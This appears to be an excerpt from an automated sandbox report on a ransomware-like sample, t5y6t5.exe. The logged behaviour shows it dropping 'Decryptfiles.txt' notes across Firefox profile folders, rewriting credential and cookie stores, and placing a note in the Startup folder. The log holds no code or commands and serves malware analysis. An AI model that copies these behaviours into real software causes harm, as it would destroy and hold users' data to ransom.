Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal.BSFAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.binJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.binJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-updateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\eventsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35edJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal.ZsdoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lock.JRZdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal.hcbGJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97caJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104abJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104abJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0cJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0cJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6bJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.aBCKJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.CYqHJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
